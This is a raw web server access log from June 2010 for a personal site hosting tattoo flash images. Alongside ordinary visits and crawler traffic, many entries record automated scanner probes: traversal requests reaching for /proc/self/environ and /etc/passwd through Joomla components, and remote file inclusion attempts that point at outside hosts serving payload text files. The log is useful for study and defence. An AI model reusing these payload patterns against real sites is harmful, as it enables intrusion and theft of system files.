174.29.169.112 - - [06/Jun/2010:22:16:52 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:52 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
174.29.169.112 - - [06/Jun/2010:22:16:52 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 FBSMTWB"
195.199.243.49 - - [06/Jun/2010:22:19:32 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
89.145.108.230 - - [06/Jun/2010:22:19:42 -0500] "GET /logs/!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.810"
89.145.108.230 - - [06/Jun/2010:22:19:43 -0500] "GET /!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
89.145.108.230 - - [06/Jun/2010:22:19:49 -0500] "GET /logs/!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.810"
89.145.108.230 - - [06/Jun/2010:22:19:49 -0500] "GET /!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
89.145.108.230 - - [06/Jun/2010:22:20:28 -0500] "GET /logs/!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.810"
89.145.108.230 - - [06/Jun/2010:22:20:28 -0500] "GET /!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
89.145.108.230 - - [06/Jun/2010:22:21:00 -0500] "GET /!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
89.145.108.230 - - [06/Jun/2010:22:21:07 -0500] "GET /!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
89.145.108.230 - - [06/Jun/2010:22:23:21 -0500] "GET /logs/access_log.1274832000/!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.810"
89.145.108.230 - - [06/Jun/2010:22:23:22 -0500] "GET /!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
89.145.108.230 - - [06/Jun/2010:22:23:22 -0500] "GET /logs/!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.810"
207.46.195.232 - - [06/Jun/2010:22:24:06 -0500] "GET /logs/access_log.1169424000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.145.108.230 - - [06/Jun/2010:22:24:32 -0500] "GET /logs/access_log.1274832000/!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.810"
89.145.108.230 - - [06/Jun/2010:22:24:32 -0500] "GET /!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
89.145.108.230 - - [06/Jun/2010:22:24:32 -0500] "GET /logs/!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.810"
207.46.13.134 - - [06/Jun/2010:22:24:37 -0500] "GET /logs/access_log.1252627200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.145.108.230 - - [06/Jun/2010:22:25:22 -0500] "GET /logs/access_log.1274313600/!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.810"
89.145.108.230 - - [06/Jun/2010:22:25:34 -0500] "GET /logs/access_log.1274313600/!scan../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.810"
67.195.112.180 - - [06/Jun/2010:22:29:29 -0500] "GET /logs/access_log.1233878400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
82.99.38.11 - - [06/Jun/2010:22:30:15 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
82.99.38.11 - - [06/Jun/2010:22:30:16 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
207.46.195.235 - - [06/Jun/2010:22:32:06 -0500] "GET /logs/access_log.1174867200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.97.239.105 - - [06/Jun/2010:22:32:36 -0500] "GET /logs/access_log.1274832000//component/option,com_myblog/Itemid,27/index2*.php?option=com_myblog&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 361 "-""libwww-perl/5.819"
216.97.239.105 - - [06/Jun/2010:22:32:36 -0500] "GET //component/option,com_myblog/Itemid,27/index2*.php?option=com_myblog&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 334 "-""libwww-perl/5.819"
216.97.239.105 - - [06/Jun/2010:22:32:37 -0500] "GET /logs//component/option,com_myblog/Itemid,27/index2*.php?option=com_myblog&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 339 "-""libwww-perl/5.819"
195.9.14.148 - - [06/Jun/2010:22:39:34 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
195.9.14.148 - - [06/Jun/2010:22:39:34 -0500] "GET /logs/access_log.1273363200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
195.9.14.148 - - [06/Jun/2010:22:39:34 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.9.14.148 - - [06/Jun/2010:22:39:37 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.9.14.148 - - [06/Jun/2010:22:39:37 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
195.9.14.148 - - [06/Jun/2010:22:39:37 -0500] "GET /logs/access_log.1273363200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
195.9.14.148 - - [06/Jun/2010:22:40:33 -0500] "GET /logs/access_log.1273363200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
195.9.14.148 - - [06/Jun/2010:22:40:35 -0500] "GET /logs/access_log.1273363200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
216.97.239.105 - - [06/Jun/2010:22:42:36 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=46&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.819"
216.97.239.105 - - [06/Jun/2010:22:42:36 -0500] "GET //index.php?option=com_myblog&Itemid=46&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.819"
216.97.239.105 - - [06/Jun/2010:22:42:36 -0500] "GET /logs//index.php?option=com_myblog&Itemid=46&show=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.819"
195.9.14.148 - - [06/Jun/2010:22:43:01 -0500] "GET /logs/access_log.1274313600%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
195.9.14.148 - - [06/Jun/2010:22:43:06 -0500] "GET /logs/access_log.1274313600%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
114.200.199.236 - - [06/Jun/2010:22:43:47 -0500] "GET /noticias.php?arq=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
114.200.199.236 - - [06/Jun/2010:22:43:47 -0500] "GET /logs/noticias.php?arq=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
114.200.199.236 - - [06/Jun/2010:22:43:47 -0500] "GET /logs/access_log.1272412800/noticias.php?arq=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.200.199.236 - - [06/Jun/2010:22:43:47 -0500] "GET /noticias.php?arq=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
114.200.199.236 - - [06/Jun/2010:22:43:47 -0500] "GET /logs/access_log.1272412800/noticias.php?arq=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.200.199.236 - - [06/Jun/2010:22:43:47 -0500] "GET /logs/access_log.1271808000/noticias.php?arq=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.200.199.236 - - [06/Jun/2010:22:43:47 -0500] "GET /logs/noticias.php?arq=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
94.23.0.30 - - [06/Jun/2010:22:44:14 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.0.30 - - [06/Jun/2010:22:44:17 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
195.9.14.148 - - [06/Jun/2010:22:44:24 -0500] "GET /logs/access_log.1272499200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
195.9.14.148 - - [06/Jun/2010:22:44:31 -0500] "GET /logs/access_log.1272499200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.nsi.or.kr/technote7/skin_shop/standard/css_javascript/id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
207.46.199.198 - - [06/Jun/2010:22:45:56 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.210.190.230 - - [06/Jun/2010:22:47:38 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
62.210.190.230 - - [06/Jun/2010:22:47:38 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.59.156.163 - - [06/Jun/2010:22:48:50 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
67.59.156.163 - - [06/Jun/2010:22:48:50 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
81.23.236.82 - - [06/Jun/2010:22:49:20 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.23.236.82 - - [06/Jun/2010:22:49:20 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.23.0.30 - - [06/Jun/2010:22:50:16 -0500] "GET /logs/index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
94.23.0.30 - - [06/Jun/2010:22:50:19 -0500] "GET /index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.190.243.10 - - [06/Jun/2010:22:52:33 -0500] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.190.243.10 - - [06/Jun/2010:22:52:33 -0500] "GET //index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
67.59.156.163 - - [06/Jun/2010:22:57:29 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
62.210.190.230 - - [06/Jun/2010:22:57:31 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
81.23.236.82 - - [06/Jun/2010:22:58:23 -0500] "GET /logs/playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-""libwww-perl/5.805"
81.23.236.82 - - [06/Jun/2010:22:58:24 -0500] "GET /playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""libwww-perl/5.805"
81.23.236.82 - - [06/Jun/2010:22:58:27 -0500] "GET /logs/playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-""libwww-perl/5.805"
81.23.236.82 - - [06/Jun/2010:22:58:27 -0500] "GET /playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""libwww-perl/5.805"
67.225.141.62 - - [06/Jun/2010:22:58:36 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=http://shangeli.net/_sys/_ext/front/functions/response.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.80.193.121 - - [06/Jun/2010:22:59:02 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)"
216.14.126.220 - - [06/Jun/2010:23:00:01 -0500] "GET /logs/playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-""libwww-perl/5.833"
216.14.126.220 - - [06/Jun/2010:23:00:01 -0500] "GET /playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""libwww-perl/5.833"
81.23.236.82 - - [06/Jun/2010:23:00:22 -0500] "GET /logs/playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-""libwww-perl/5.805"
81.23.236.82 - - [06/Jun/2010:23:00:22 -0500] "GET /playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""libwww-perl/5.805"
81.23.236.82 - - [06/Jun/2010:23:00:24 -0500] "GET /logs/playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-""libwww-perl/5.805"
81.23.236.82 - - [06/Jun/2010:23:00:25 -0500] "GET /playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""libwww-perl/5.805"
72.30.142.216 - - [06/Jun/2010:23:01:48 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [06/Jun/2010:23:01:48 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.121.77.90 - - [06/Jun/2010:23:05:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
188.72.70.56 - - [06/Jun/2010:23:06:03 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:06:04 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:06:28 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:06:28 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
79.170.45.162 - - [06/Jun/2010:23:08:25 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [06/Jun/2010:23:08:26 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
79.170.45.162 - - [06/Jun/2010:23:08:43 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
79.170.45.162 - - [06/Jun/2010:23:08:43 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
188.72.70.56 - - [06/Jun/2010:23:09:40 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:09:41 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
81.23.236.82 - - [06/Jun/2010:23:10:54 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.23.236.82 - - [06/Jun/2010:23:10:54 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
206.188.209.35 - - [06/Jun/2010:23:10:56 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
206.188.209.35 - - [06/Jun/2010:23:10:56 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.225.141.62 - - [06/Jun/2010:23:11:24 -0500] "GET /logs/index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
67.225.141.62 - - [06/Jun/2010:23:11:25 -0500] "GET /index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
174.121.77.90 - - [06/Jun/2010:23:12:30 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
188.72.70.56 - - [06/Jun/2010:23:12:59 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:13:00 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.195.112.180 - - [06/Jun/2010:23:14:10 -0500] "GET /?S=D HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
96.246.29.77 - - [06/Jun/2010:23:14:11 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?q=bert+grimm+tattoo+flash&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:14:11 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:14:13 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:14:15 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:14:22 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:14:22 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:14:22 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:14:22 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:14:22 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:14:22 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:14:22 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:14:22 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:14:22 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:14:22 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:14:22 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
188.72.70.56 - - [06/Jun/2010:23:14:45 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
188.72.70.56 - - [06/Jun/2010:23:14:49 -0500] "GET /index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
96.246.29.77 - - [06/Jun/2010:23:15:20 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:15:20 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:15:20 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:15:20 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:15:20 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
96.246.29.77 - - [06/Jun/2010:23:15:20 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729)"
